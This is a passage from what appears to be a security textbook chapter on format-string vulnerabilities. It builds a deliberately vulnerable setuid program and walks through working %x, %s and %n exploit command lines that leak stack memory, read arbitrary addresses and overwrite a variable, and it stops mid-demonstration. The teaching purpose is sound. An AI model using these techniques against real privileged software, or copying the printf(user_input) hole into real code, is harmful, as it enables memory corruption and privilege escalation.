0x290 Format Strings

Format-string exploits are a relatively new class of exploit. Like buffer-overflow exploits, the ultimate goal of a format-string exploit is to overwrite data in order to control the execution flow of a privileged program. Format-string exploits also depend on programming mistakes that may not appear to have an obvious impact on security. Luckily for programmers, once the technique is known, it's fairly easy to spot format-string vulnerabilities and eliminate them. But first some background on format strings is needed.

0x291 Format Strings and printf()

Format strings are used by format functions, like printf(). These are functions that take in a format string as the first argument, followed by a variable number of arguments that are dependent on the format string. The printf() function has been used extensively in the previous pieces of code. Here's one example from the last program:

printf("You picked:    %d\n", user_pick);

Here the format string is "You picked: %d\n". The printf() function prints the format string, but it performs a special operation when a format parameter like %d is encountered. This parameter is used to print the next argument of the function as a decimal integer value. The following table lists some other similar format parameters:

Parameter	Output Type

%d	Decimal
%u	Unsigned decimal
%x	Hexadecimal

All of the preceding format parameters get their data as values, not pointers to values. There are also some format parameters that expect pointers, such as the following:

Parameter	Output Type

%s	String
%n	Number of bytes written so far

The %s format parameter expects to be given a memory address and prints the data at that memory address until a null byte is encountered. The %n format parameter is special, in that it actually writes data. It also expects to be given a memory address and writes the number of bytes that have been written so far into that memory address.

A format function, such as printf(), simply evaluates the format string passed to it and performs a special action each time a format parameter is encountered. Each format parameter expects an additional variable to be passed, so if there are three format parameters in a format string, there should be three additional arguments to the function (in addition to the format-string argument). Some example code should help clarify things.

fmt_example.c code

#include <stdio.h>
#include <stdlib.h>

int main()
{
   char string[7] = "sample";
   int A = -72;
   unsigned int B = 31337;
   int count_one, count_two;

// Example of printing with different format string
   printf("[A] Dec: %d, Hex: %x, Unsigned: %u\n", A, A, A);
   printf("[B] Dec: %d, Hex: %x, Unsigned: %u\n", B, B, B);
   printf("[field width on B] 3: '%3u', 10: '%10u', '%08u'\n", B, B, B);
   printf("[string] %s Address %08x\n", string, string);

// Example of unary address operator and a %x format string
   printf("count_one is located at: %08x\n", &count_one);
   printf("count_two is located at: %08x\n", &count_two);

// Example of a %n format string
   printf("The number of bytes written up to this point X%n is being stored in "
          "count_one, and the number of bytes up to here X%n is being stored in "
          "count_two.\n", &count_one, &count_two);

   printf("count_one: %d\n", count_one);
   printf("count_two: %d\n", count_two);

// Stack Example
   printf("A is %d and is at %08x. B is %u and is at %08x.\n", A, &A, B, &B);

   exit(0);
}

The following is the output of the program's compilation and execution.

$ gcc -o fmt_example fmt_example.c
$ ./fmt_example
[A] Dec: -72, Hex: ffffffb8, Unsigned: 4294967224
[B] Dec: 31337, Hex: 7a69, Unsigned: 31337
[field width on B] 3: '31337', 10: '     31337', '00031337'
[string] sample Address bffff960
count_one is located at: bffff964
count_two is located at: bffff960
The number of bytes written up to this point X is being stored in count_one, and
the number of bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is -72 and is at bffff95c. B is 31337 and is at bffff958.
$

The first two printf() statements demonstrate the printing of variables A and B, using different format parameters. Because there are three format parameters in each line, the variables A and B need to be supplied three times each. The %d format parameter allows for negative values, while %u does not, because it is expecting unsigned values.

A is outputted as a very high value when %u is used, because the negative value is stored using two's complement, but displayed as an unsigned value. Two's complement is the way negative numbers are stored on computers. The idea behind two's complement is to provide a binary representation of a number that when added to a positive number of the same magnitude will produce zero. This is done by first writing the positive number in binary, then flipping all the bits, and finally adding one. This can be quickly explored and validated with a hexadecimal and binary calculator, such as pcalc.

$ pcalc 72
        72              0x48              0y1001000
$ pcalc 0y0000000001001000
        72              0x48              0y1001000
$ pcalc 0y1111111110110111
        65463           0xffb7            0y1111111110110111
$ pcalc 0y1111111110110111 + 1
        65464           0xffb8            0y1111111110111000
$

This pcalc example shows that the last 2 bytes of the two's complement representation for –72 should be 0xffb8, which can be seen to be correct in the hexadecimal output of A.
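The flip-and-add-one recipe is short enough to check in C as well. The following is a minimal sketch and not part of fmt_example.c; the function name twos_complement is made up for illustration, and it assumes the fixed-width types from <stdint.h>.

```c
#include <stdint.h>

/* Negate a 32-bit magnitude the way the text describes:
   flip every bit, then add one. */
uint32_t twos_complement(uint32_t magnitude)
{
    return ~magnitude + 1u;
}
```

Calling twos_complement(72) gives 0xffffffb8, and the last 2 bytes of that value are the 0xffb8 that pcalc produced.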

The third line in the example, labeled [field width on B], shows the use of the field width option in a format parameter. This is just an integer number that designates the minimum field width for that format parameter. However, this is not a maximum field width: If the value to be outputted is greater than the field width, the field width will be exceeded. This happens when 3 is used, because the output data needs 5 bytes. When 10 is used as the field width, 5 bytes of blank space are outputted before the output data. Additionally, if a field width value begins with a zero, this means the field should be padded with zeros. When 08 is used, for example, the output is 00031337.
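The three field width cases can also be captured in a buffer instead of being printed, which makes the padding easier to inspect. This is only a sketch; the helper name format_widths is hypothetical, and snprintf() is used so the result can be compared as a string.

```c
#include <stdio.h>

/* Format value three ways into out: minimum width 3, minimum width 10,
   and zero-padded width 8, mirroring the [field width on B] line. */
int format_widths(char *out, size_t cap, unsigned int value)
{
    return snprintf(out, cap, "'%3u' '%10u' '%08u'", value, value, value);
}
```

With a value of 31337, the buffer should hold '31337' (width exceeded), then 31337 preceded by five spaces, then 00031337.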

The fourth line, labeled [string], simply shows the use of the %s format parameter. The variable string is actually a pointer containing the address of the string, which works out wonderfully, because the %s format parameter expects its data to be passed by reference.

As these examples show, you should use %d for decimal, %u for unsigned, and %x for hexadecimal values. Minimum field widths can be set by putting a number right after the percent sign, and if the field width begins with 0, it will be padded with zeros. The %s parameter can be used to print strings and should be passed the address of the string. So far, so good.

The next part of the example demonstrates the use of the unary address operator. In C, any variable prepended with an ampersand will return the address of that variable. Here's that section of the fmt_example.c code:

// Example of unary address operator and a %x format string
  printf("count_one is located at: %08x\n", &count_one);
  printf("count_two is located at: %08x\n", &count_two);

The next piece of the fmt_example.c code demonstrates the use of the %n format parameter. The %n format parameter is different than all other format parameters, in that it writes data without displaying anything, as opposed to reading and then displaying data. When a format function encounters a %n format parameter, it writes out the number of bytes that have been written by the function to the address in the corresponding function argument. In fmt_example, this is done at two places, and the unary address operator is used to write this data into the variables count_one and count_two, respectively. The values are then outputted, revealing that 46 bytes are found before the first %n, and 113 before the second.
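The two counts can be double-checked without printing anything by letting snprintf() do the formatting. The sketch below is an illustration rather than part of fmt_example.c; the function name count_bytes is invented here, and it assumes a C library that still honors %n (some hardened libraries restrict or disable it).

```c
#include <stdio.h>

/* Reproduce the two %n writes from fmt_example.c without printing:
   snprintf() formats into a buffer, and each %n stores the running
   byte count at the address supplied for it. */
void count_bytes(int *count_one, int *count_two)
{
    char buf[256];

    snprintf(buf, sizeof buf,
             "The number of bytes written up to this point X%n is being stored in "
             "count_one, and the number of bytes up to here X%n is being stored in "
             "count_two.\n",
             count_one, count_two);
}
```

After the call, the first integer should hold 46 and the second 113, the same values the program reported.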

Finally, the stack example provides a convenient segue into an explanation of the stack's role with format strings:

printf("A is %d and is at %08x. B is %u and is at %08x.\n", A, &A, B, &B);

When this printf() function is called (as with any function), the arguments are pushed to the stack in reverse order. First the address of B is pushed, then the value of B, then the address of A, then the value of A, and finally the address of the format string. The stack will look like this:

Top of the stack
   Address of format string
   Value of A
   Address of A
   Value of B
   Address of B
Bottom of the stack

The format function iterates through the format string one character at a time. If the character isn't the beginning of a format parameter (which is designated by the percent sign), the character is copied to the output. If a format parameter is encountered, the appropriate action is taken, using the argument in the stack corresponding to that parameter.
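To make that loop concrete, here is a toy format function. It is a sketch under heavy assumptions: the name mini_format is hypothetical, it understands only %d, %s, and %%, and it leans on snprintf() for the actual conversions, so it is nothing like a real printf() implementation. What it does show is the character-by-character walk and the way each format parameter pulls the next argument.

```c
#include <stdarg.h>
#include <stdio.h>

/* Toy format function: copies ordinary characters and handles %d, %s, %%.
   Returns the number of bytes placed in out (not counting the null byte). */
int mini_format(char *out, size_t cap, const char *fmt, ...)
{
    va_list ap;
    size_t used = 0;

    if (cap == 0)
        return 0;

    va_start(ap, fmt);
    for (const char *p = fmt; *p != '\0' && used + 1 < cap; p++) {
        int n;

        if (*p != '%') {              /* ordinary character: copy it */
            out[used++] = *p;
            continue;
        }
        p++;                          /* look at the character after '%' */
        if (*p == 'd')                /* next argument is an int value */
            n = snprintf(out + used, cap - used, "%d", va_arg(ap, int));
        else if (*p == 's')           /* next argument is an address */
            n = snprintf(out + used, cap - used, "%s", va_arg(ap, const char *));
        else if (*p == '%')           /* literal percent sign */
            n = snprintf(out + used, cap - used, "%%");
        else                          /* unsupported parameter or end of string */
            break;
        if (n < 0)
            break;
        used += (size_t)n;
        if (used >= cap)              /* output was truncated by snprintf() */
            used = cap - 1;
    }
    va_end(ap);
    out[used] = '\0';
    return (int)used;
}
```

Notice that the function has no way of knowing how many arguments were really passed; it simply fetches one for each format parameter it meets.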

But what if only three arguments are pushed to the stack with a format string that uses four format parameters? Try changing the printf() line in the stack example to this:

printf("A is %d and is at %08x. B is %u and is at %08x.\n", A, &A, B);

This can be done in an editor or with a little bit of sed magic.

$ sed -e 's/B, &B)/B)/' fmt_example.c > fmt_example2.c
$ gcc -o fmt_example fmt_example2.c
$ ./fmt_example
[A] Dec: -72, Hex: ffffffb8, Unsigned: 4294967224
[B] Dec: 31337, Hex: 7a69, Unsigned: 31337
[field width on B] 3: '31337', 10: '     31337', '00031337'
[string] sample Address bffff970
count_one is located at: bffff964
count_two is located at: bffff960
The number of bytes written up to this point X is being stored in count_one, and
the number of bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is -72 and is at bffff96c. B is 31337 and is at 00000071.
$

The result is 00000071. What the hell is 00000071? It turns out that because there wasn't a value pushed to the stack, the format function just pulled data from where the fourth argument should have been (by adding to the current frame pointer). This means 0x00000071 is the first value found below the stack frame for the format function.

This is definitely an interesting detail that should be remembered. It certainly would be a lot more useful if there were a way to control either the number of arguments passed to or expected by a format function. Luckily, there is a fairly common programming mistake that allows for the latter.

0x292 The Format-String Vulnerability

Sometimes programmers print strings using printf(string), instead of printf("%s", string). Functionally, this works fine. The format function is passed the address of the string, as opposed to the address of a format string, and it iterates through the string, printing each character. Both methods are shown in the following example.

fmt_vuln.c code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
   char text[1024];
   static int test_val = -72;

   if(argc < 2)
   {
      printf("Usage: %s <text to print>\n", argv[0]);
      exit(0);
   }
   strcpy(text, argv[1]);

   printf("The right way:\n");
// The right way to print user-controlled input:
   printf("%s", text);
// ---------------------------------------------

   printf("\nThe wrong way:\n");
// The wrong way to print user-controlled input:
   printf(text);
// ---------------------------------------------
   printf("\n");
// Debug output
   printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val);

   exit(0);
}

The following output shows the compilation and execution of fmt_vuln.

$ gcc -o fmt_vuln fmt_vuln.c
$ sudo chown root.root fmt_vuln
$ sudo chmod u+s fmt_vuln
$ ./fmt_vuln testing
The right way:
testing
The wrong way:
testing
[*] test_val @ 0x08049570 = -72 0xffffffb8
$

Both methods seem to work fine with the string testing. But what happens if the string contains a format parameter? The format function should try to evaluate the format parameter and access the appropriate function argument by adding to the frame pointer. But as we saw earlier, if the appropriate function argument isn't there, adding to the frame pointer will reference a piece of memory in a preceding stack frame.

$ ./fmt_vuln testing%x
The right way:
testing%x
The wrong way:
testingbffff5a0
[*] test_val @ 0x08049570 = -72 0xffffffb8
$

When the %x format parameter was used, the hexadecimal representation of a 4-byte word in the stack was printed. This process can be used repeatedly to examine stack memory.

$ ./fmt_vuln $(perl -e 'print "%08x."x40;')
The right way:
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08
x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%
08x.%08x.%08x.%08x.%08x.%08x.%08x.
The wrong way:
bffff4e0.000003e8.000003e8.78383025.3830252e.30252e78.252e7838.2e783830.78383025.38
30252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.7838
3025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e7838
30.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838
.2e783830.78383025.3830252e.
[*] test_val @ 0x08049570 = -72 0xffffffb8
$

So this is what the lower stack memory looks like. Remember that each 4-byte word is backward, due to the little-endian architecture. The bytes 0x25, 0x30, 0x38, 0x78, and 0x2e seem to be repeating a lot. Wonder what those bytes are.

$ printf "\x25\x30\x38\x78\x2e\n"
%08x.
$
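The same decoding can be sketched in C by pulling the bytes out of each printed word, least significant byte first. The helper name word_to_memory_order is hypothetical, and the sketch assumes the words are the 32-bit values shown in the output above.

```c
#include <stdint.h>

/* Unpack a 32-bit word, as printed by %08x, into the four bytes in the
   order they sit in little-endian memory (least significant byte first).
   out must have room for four characters and a null byte. */
void word_to_memory_order(uint32_t word, char out[5])
{
    for (int i = 0; i < 4; i++)
        out[i] = (char)((word >> (8 * i)) & 0xffu);
    out[4] = '\0';
}
```

Feeding it 0x78383025 and then 0x3830252e should produce "%08x" followed by ".%08", which is the start of the repeating pattern.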

As you can see, it's the memory for the format string itself. Because the format function will always be on the highest stack frame, as long as the format string has been stored anywhere on the stack, it will be located below the current frame pointer (at a higher memory address). This fact can be used to control arguments to the format function. It is particularly useful if format parameters that pass by reference are used, such as %s or %n.
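Since the whole problem comes from handing user input to the format function as the format string, the fix is mechanical. The sketch below shows one way to wrap it; both function names are hypothetical, and the second helper is only a rough check for a percent sign that printf() would treat as a format parameter, not a complete parser.

```c
#include <stdio.h>

/* Print untrusted text safely: the format string is a constant, so any
   '%' characters in text are treated as plain data. */
int print_untrusted(FILE *out, const char *text)
{
    return fprintf(out, "%s", text);
}

/* Report whether text contains a '%' that would start a format parameter
   if text were used as a format string ("%%" is a literal percent sign). */
int has_format_parameter(const char *text)
{
    for (const char *p = text; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {   /* escaped percent sign: skip both characters */
            p++;
            continue;
        }
        return 1;
    }
    return 0;
}
```

A string such as testing%x passes through print_untrusted() unchanged, while has_format_parameter() flags it as something that should never reach printf() as the first argument.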

0x293 Reading from Arbitrary Memory Addresses

The %s format parameter can be used to read from arbitrary memory addresses. Because it's possible to read the data of the original format string, part of the original format string can be used to supply an address to the %s format parameter, as shown here:

$ ./fmt_vuln AAAA%08x.%08x.%08x.%08x
The right way:
AAAA%08x.%08x.%08x.%08x
The wrong way:
AAAAbffff590.000003e8.000003e8.41414141
[*] test_val @ 0x08049570 = -72 0xffffffb8
$

The four bytes of 0x41 indicate that the fourth format parameter is reading from the beginning of the format string to get its data. If the fourth format parameter is %s instead of %x, the format function will attempt to print the string located at 0x41414141. This will cause the program to crash in a segmentation fault, because this isn't a valid address. But if a valid memory address is used, this process could be used to read a string found at that memory address.

$ ./getenvaddr PATH
PATH is located at 0xbffffd10
$ pcalc 0x10 + 4
      20          0x14       0y10100
$ ./fmt_vuln $(printf "\x14\xfd\xff\xbf")%08x.%08x.%08x%s
The right way:
yáÿ¿%08x.%08x.%08x%s
The wrong way:
yáÿ¿bffff480.00000065.00000000/bin:/usr/bin:/usr/local/bin:/opt/bin:/usr/X11R6/bin:/
usr/games/bin:/opt/insight/bin:.:/sbin:/usr/sbin:/usr/local/sbin:/home/matrix/bin
[*] test_val @ 0x08049570 = -72 0xffffffb8
$
$ ./fmt_vuln $(printf "\x14\xfd\xff\xbf")%x.%x.%x%s
The right way:
yáÿ¿%x.%x.%x%s
The wrong way:
yáÿ¿bffff490.65.0/bin:/usr/bin:/usr/local/bin:/opt/bin:/usr/X11R6/bin:/usr/games/bin
:/opt/insight/bin:.:/sbin:/usr/sbin:/usr/local/sbin:/home/matrix/bin
[*] test_val @ 0x08049570 = -72 0xffffffb8

Here the getenvaddr program is used to get the address for the environment variable PATH. Because the program name fmt_vuln is two bytes shorter than getenvaddr, and each byte of difference in program-name length shifts the address by two bytes, 4 is added to the address. The bytes are then reversed because of the little-endian byte ordering. The fourth format parameter, %s, reads from the beginning of the format string, treating those bytes as the address that was passed as a function argument. Because this is the address of the PATH environment variable, it is printed as if a pointer to the environment variable had been passed to printf().
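The address arithmetic and the byte reversal can both be written down in a few lines of C. This is a sketch with invented helper names (adjust_for_name and pack_le32), and it assumes the rule implied by the numbers above: two bytes of shift for every character of difference between the two program names.

```c
#include <stdint.h>
#include <string.h>

/* Shift an address reported by one program so that it applies to another,
   assuming two bytes of shift per character of program-name difference. */
uint32_t adjust_for_name(uint32_t addr, const char *probe_name,
                         const char *target_name)
{
    long diff = (long)strlen(probe_name) - (long)strlen(target_name);
    return addr + (uint32_t)(2 * diff);
}

/* Store addr least significant byte first, which is the order the bytes
   must have at the start of the format string. */
void pack_le32(uint32_t addr, unsigned char out[4])
{
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)(addr >> (8 * i));
}
```

Starting from 0xbffffd10 with the names getenvaddr and fmt_vuln, the adjusted address is 0xbffffd14, and packing it yields the bytes 0x14, 0xfd, 0xff, and 0xbf used on the command line.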

Now that the distance between the end of the stack frame and the beginning of the format-string memory is known, the field width arguments can be omitted in the %x format parameters. These format parameters are only needed to step through memory. Using this technique, any memory address can be examined as a string.

0x294 Writing to Arbitrary Memory Addresses

If the %s format parameter can be used to read an arbitrary memory address, the same technique using %n should be able to write to an arbitrary memory address. Now things are getting interesting.

The test_val variable has been printing its address and value in the debug statement of the vulnerable fmt_vuln program, just begging to be overwritten. The test variable is located at 0x08049570, so by using a similar technique as before, you should be able to write to the variable.

$ ./fmt_vuln $(printf "\x70\x95\x04\x08")%x.%x.%x%n
The right way:
%x.%x.%x%n
The wrong way:
bffff5a0.3e8.3e8
[*] test_val @ 0x08049570 = 20 0x00000014
$ ./fmt_vuln $(printf "\x70\x95\x04\x08")%08x.%08x.%08x%n
The right way:
%08x.%08x.%08x%n
The wrong way:
bffff590.000003e8.000003e8
[*] test_val @ 0x08049570 = 30 0x0000001e
$

As this shows, the test_val variable can indeed be overwritten using the %n format parameter. The resulting value in the test variable depends on the number of bytes written before the %n. This can be controlled to a greater degree by manipulating the field width option.

$ ./fmt_vuln $(printf "\x70\x95\x04\x08")%x.%x.%100x%n
The right way:
%x.%x.%100x%n
The wrong way:
bffff5a0.3e8.
                                       3e8
[*] test_val @ 0x08049570 = 117 0x00000075
$ ./fmt_vuln $(printf "\x70\x95\x04\x08")%x.%x.%183x%n
The right way:
%x.%x.%183x%n
The wrong way:
bffff5a0.3e8.
                                                 3e8
[*] test_val @ 0x08049570 = 200 0x000000c8
$ ./fmt_vuln $(printf "\x70\x95\x04\x08")%x.%x.%238x%n
The right way:
%x.%x.%238x%n
The wrong way:
bffff5a0.3e8.

                                3e8
[*] test_val @ 0x08049570 = 255 0x000000ff
$

By manipulating the field width option of one of the format parameters before the %n, a certain number of blank spaces can be inserted (these show up as blank lines in the wrapped output), which in turn controls the number of bytes written before the %n format parameter. This approach works fine for small numbers, but it won't work for larger ones, like memory addresses.
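The relationship between the field width and the value stored by %n can be reproduced safely with snprintf(). In this sketch, the four-byte address at the front of the format string is stood in for by AAAA, the two words are the ones from the output above, and the function name count_with_width is hypothetical. It also assumes a C library that honors %n.

```c
#include <stdio.h>

/* Return what %n stores after a 4-byte placeholder, two %x words, and a
   third %x word padded to the given minimum field width. */
int count_with_width(int width)
{
    char buf[512];
    int count = -1;

    snprintf(buf, sizeof buf, "AAAA%x.%x.%*x%n",
             0xbffff5a0u, 0x3e8u, width, 0x3e8u, &count);
    return count;
}
```

Widths of 100, 183, and 238 give 117, 200, and 255, matching the three runs above. Everything before the padded word accounts for 17 bytes, so the stored value is always 17 plus the field width.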

Looking at the hexadecimal representation of the test_val value, it's apparent that the least significant byte can be controlled fairly well. Remember that the least significant byte is actually located in the first byte of the 4-byte word of memory. This detail can be used to write an entire address. If four writes are done at sequential memory addresses, the least significant byte can be written to each byte of a 4-byte word, as shown here:

Write	Bytes written	Address
First write	AA 00 00 00	0x08049570
Second write	   BB 00 00 00	0x08049571
Third write	      CC 00 00 00	0x08049572
Fourth write	         DD 00 00 00	0x08049573
Result	AA BB CC DD

As an example, let's try to write the address 0xDDCCBBAA into the test variable. In memory, the first byte of the test variable should be 0xAA, then 0xBB, then 0xCC, and finally 0xDD. Four separate writes to the memory addresses 0x08049570, 0x08049571, 0x08049572, and 0x08049573 should accomplish this. The first write will write the value 0x000000aa, the second 0x000000bb, the third 0x000000cc, and finally 0x000000dd.
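The overlapping writes are easy to simulate on an ordinary byte array. This sketch doesn't touch a real process; the function names are hypothetical, and each simulated write stores a 4-byte count, least significant byte first, the way %n would on this little-endian architecture.

```c
#include <stddef.h>
#include <stdint.h>

/* Simulate one %n write: store a 32-bit count, least significant byte
   first, starting at mem[offset]. */
void write_count(unsigned char *mem, size_t offset, uint32_t count)
{
    for (int i = 0; i < 4; i++)
        mem[offset + i] = (unsigned char)(count >> (8 * i));
}

/* Perform the four overlapping writes; mem needs at least 7 bytes. */
void four_writes(unsigned char *mem)
{
    write_count(mem, 0, 0xaa);
    write_count(mem, 1, 0xbb);
    write_count(mem, 2, 0xcc);
    write_count(mem, 3, 0xdd);
}
```

After four_writes(), the first four bytes hold AA BB CC DD, which reads back as 0xddccbbaa. The three bytes after them have been zeroed by the upper bytes of the later writes.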

The first write should be easy.

$ ./fmt_vuln $(printf "\x70\x95\x04\x08")%x.%x.%x%n
The right way:
%x.%x.%x%n
The wrong way:
bffff5a0.3e8.3e8
[*] test_val @ 0x08049570 = 20 0x00000014
$ pcalc 20 - 3
        17             0x11             0y10001
$ pcalc 0xaa - 17
        153            0x99             0y10011001
$ ./fmt_vuln $(printf "\x70\x95\x04\x08")%x.%x.%153x%n
The right way:
%x.%x.%153x%n
The wrong way:
bffff5a0.3e8.

                  3e8
[*] test_val @ 0x08049570 = 170 0x000000aa
$

The first byte should be 0xAA, and the last %x format parameter outputs 3 bytes of 3e8. Because 20 was written into the test variable, basic math can be used to deduce that the format parameters before that had written 17 bytes. In order to get the least significant byte to equal 0xAA, the last %x format parameter must be made to output 153 bytes instead of just 3. The field width parameter can make this adjustment quite nicely.
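The two pcalc steps boil down to one small formula. Here it is as a C function; the name field_width_for and its parameter names are made up for this sketch.

```c
/* Given the value %n stored in a trial run (baseline), the number of bytes
   the last %x printed in that run (natural_len), and the desired byte
   count, return the minimum field width to give that last %x. */
int field_width_for(int baseline, int natural_len, int desired)
{
    int fixed = baseline - natural_len;   /* bytes printed by everything else */
    return desired - fixed;
}
```

With a baseline of 20, a natural length of 3, and a desired count of 0xaa, the result is 153. Keep in mind that the result is only useful when it is at least as large as the natural length, because a field width is a minimum and can't shrink the output.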

Now for the next write. Another argument is needed for another %x format parameter to increment the byte count up to 187, which is the decimal value of 0xBB. This argument could be anything; it just has to be four bytes long and must be located after the first arbitrary memory address of 0x08049570. Because this is all still in the memory of the format string, it can be easily controlled. The word "JUNK" is four bytes long and will work fine.

After that, the next memory address to be written to, 0x08049571, should be put into memory so the second %n format parameter can access it. This means the beginning of the format string should consist of the target memory address, four bytes of junk, and then the target memory address plus one. But all of these bytes of memory are also printed out by the format function, thus incrementing the byte counter used for the %n format parameter. This is getting tricky.

Perhaps the beginning of the format string should be thought about ahead of time. The end goal is to have four writes. Each one will need to have a memory address passed to it, and between them all, four bytes of junk are needed to properly increment the byte counter for the %n format parameters. The first %x format parameter can use the four bytes found before the format string itself, but the remaining three will need to be supplied data. So, for the entire write procedure, the beginning of the format string should look like this:

0x08049570   JUNK   0x08049571   JUNK   0x08049572   JUNK   0x08049573

Let's give it a try.

$ ./fmt_vuln $(printf "\x70\x95\x04\x08JUNK\x71\x95\x04\x08JUNK\x72\x95\x04\x08JUNK\x73\x95\x04\x08")%x.%x.%x%n
The right way:
JUNKJUNKJUNK%x.%x.%x%n
The wrong way:
JUNKJUNKJUNKbffff580.3e8.3e8
[*] test_val @ 0x08049570 = 44 0x0000002c
$ pcalc 44 - 3
        41             0x29            0y101001
$ pcalc 0xaa - 41
        129            0x81            0y10000001
$ ./fmt_vuln $(printf "\x70\x95\x04\x08JUNK\x71\x95\x04\x08JUNK\x72\x95\x04\x08JUNK\x73\x95\x04\x08")%x.%x.%129x%n
The right way:
JUNKJUNKJUNK%x.%x.%129x%n
The wrong way:
JUNKJUNKJUNKbffff580.3e8.

       3e8
[*] test_val @ 0x08049570 = 170 0x000000aa
$

The addresses and junk data at the beginning of the format string changed the value of the necessary field width option for the %x format parameter. However, this is easily recalculated using the same method as before. Another way this could have been done is to subtract 24 from the previous field width value of 153, because six new 4-byte words have been added to the front of the format string.
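Typing those escaped bytes by hand is error-prone, so it can help to generate them. The following sketch builds the same 28-byte prefix in a buffer; the function name build_prefix is hypothetical, and the spacer word is the same JUNK used on the command line.

```c
#include <stdint.h>
#include <string.h>

/* Fill out with addr, "JUNK", addr+1, "JUNK", addr+2, "JUNK", addr+3,
   each address stored least significant byte first.
   Returns the number of bytes written, which is always 28. */
size_t build_prefix(uint32_t addr, unsigned char out[28])
{
    size_t n = 0;

    for (uint32_t i = 0; i < 4; i++) {
        uint32_t a = addr + i;

        for (int b = 0; b < 4; b++)
            out[n++] = (unsigned char)(a >> (8 * b));
        if (i < 3) {                    /* spacer word between addresses */
            memcpy(out + n, "JUNK", 4);
            n += 4;
        }
    }
    return n;
}
```

The prefix is 28 bytes long, which is 24 bytes more than the single address used earlier. That accounts for the drop in field width from 153 to 129.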

Now that all the memory is set up ahead of time in the beginning of the format string, the second write should be simple.

$ pcalc 0xbb - 0xaa
        17             0x11          0y10001
$ ./fmt_vuln $(printf "\x70\x95\x04\x08JUNK\x71\x95\x04\x08JUNK\x72\x95\x04\x08JUNK\x73\x95\x04\x08")%x.%x.%129x%n%17x%n
The right way:
JUNKJUNKJUNK%x.%x.%129x%n%17x%n
The wrong way:
JUNKJUNKJUNKbffff580.3e8.

       3e8        4b4e554a
[*] test_val @ 0x08049570 = 48042 0x0000bbaa
$

The next desired value for the least significant byte is 0xBB. A hexadecimal calculator quickly shows that 17 more bytes need to be written before the next %n format parameter. Because memory has already been set up for a %x format parameter, it's simple to write 17 bytes using the field width option.

This process can be repeated for the third and fourth writes.

$ pcalc 0xcc - 0xbb
        17             0x11          0y10001
$ ./fmt_vuln $(printf "\x70\x95\x04\x08JUNK\x71\x95\x04\x08JUNK\x72\x95\x04\x08JUNK\x73\x95\x04\x08")%x.%x.%129x%n%17x%n%17x%n
The right way:
JUNKJUNKJUNK%x.%x.%129x%n%17x%n%17x%n
The wrong way:
JUNKJUNKJUNKbffff570.3e8.

       3e8         4b4e554a         4b4e554a
[*] test_val @ 0x08049570 = 13417386 0x00ccbbaa
$ pcalc 0xdd - 0xcc
        17             0x11          0y10001
$ ./fmt_vuln $(printf "\x70\x95\x04\x08JUNK\x71\x95\x04\x08JUNK\x72\x95\x04\x08JUNK\x73\x95\x04\x08")%x.%x.%129x%n%17x%n%17x%n%17x%n
The right way:
JUNKJUNKJUNK%x.%x.%129x%n%17x%n%17x%n%17x%n
The wrong way:
JUNKJUNKJUNKbffff570.3e8.

       3e8         4b4e554a         4b4e554a          4b4e554a
[*] test_val @ 0x08049570 = -573785174 0xddccbbaa
$

By controlling the least significant byte and performing four writes, an entire address can be written to any memory address. It should be noted that the three bytes found after the target address will also get overwritten using this technique. This can be quickly explored by statically declaring another initialized variable called next_val, right after test_val, and also displaying this value in the debug output. The changes can be made in an editor or with some more sed magic.

Here, next_val is initialized with the value 0x11111111, so the effect of the write operations on it will be apparent.

$ sed -e 's/72;/72, next_val = 0x11111111;/;/@/{h;s/test/next/g;x;G}' fmt_vuln.c > fmt_vuln2.c
$ diff fmt_vuln.c fmt_vuln2.c
6c6
<       static int test_val = -72;
---
>       static int test_val = -72, next_val = 0x11111111;
27a28
>       printf("[*] next_val @ 0x%08x = %d 0x%08x\n", &next_val, next_val, next_val);
$ gcc -o fmt_vuln2 fmt_vuln2.c
$ ./fmt_vuln2 test
The right way:
test
The wrong way:
test
[*] test_val @ 0x080495d0 = -72 0xffffffb8
[*] next_val @ 0x080495d4 = 286331153 0x11111111

As the preceding output shows, the code change has also moved the address of the test_val variable. However, next_val is shown to be adjacent to it. It should be good practice to write an address into the variable test_val again, using the new address.

Last time, a very convenient address of 0xddccbbaa was used. Because each byte is greater than the previous byte, it's easy to increment the byte counter for each byte. But what if an address like 0x0806abcd is used? With this address, 205 bytes must first be outputted in order to write the first byte of 0xCD using the %n format parameter. But then the next byte to be written is 0xAB, which would need to have 171 bytes outputted. It's easy to increment the byte counter for the %n format parameter, but it's impossible to subtract from it. So, instead of trying to subtract 34 from 205, the least significant byte is just wrapped around to 0x1AB by adding 222 to 205 to produce 427, which is the decimal representation of 0x1AB. This technique can be used to wrap around again to set the least significant byte to 0x06 for the third write.

$ ./fmt_vuln2 AAAA%x.%x.%x.%x
The right way:
AAAA%x.%x.%x.%x
The wrong way:
AAAAbffff5a0.3e8.3e8.41414141
[*] test_val @ 0x080495d0 = -72 0xffffffb8
[*] next_val @ 0x080495d4 = 286331153 0x11111111
$ ./fmt_vuln2 $(printf "\xd0\x95\x04\x08JUNK\xd1\x95\x04\x08JUNK\xd2\x95\x04\x08JUNK\xd3\x95\x04\x08")%x.%x.%x.%n
The right way:
JUNKJUNKJUNK%x.%x.%x.%n
The wrong way:
JUNKJUNKJUNKbffff580.3e8.3e8.
[*] test_val @ 0x080495d0 = 45 0x0000002d
[*] next_val @ 0x080495d4 = 286331153 0x11111111
$ pcalc 45 - 3
        42              0x2a           0y101010
$ pcalc 0xcd - 42
        163             0xa3           0y10100011
$ ./fmt_vuln2 $(printf "\xd0\x95\x04\x08JUNK\xd1\x95\x04\x08JUNK\xd2\x95\x04\x08JUNK\xd3\x95\x04\x08")%x.%x.%163x.%n
The right way:
JUNKJUNKJUNK%x.%x.%163x.%n
The wrong way:
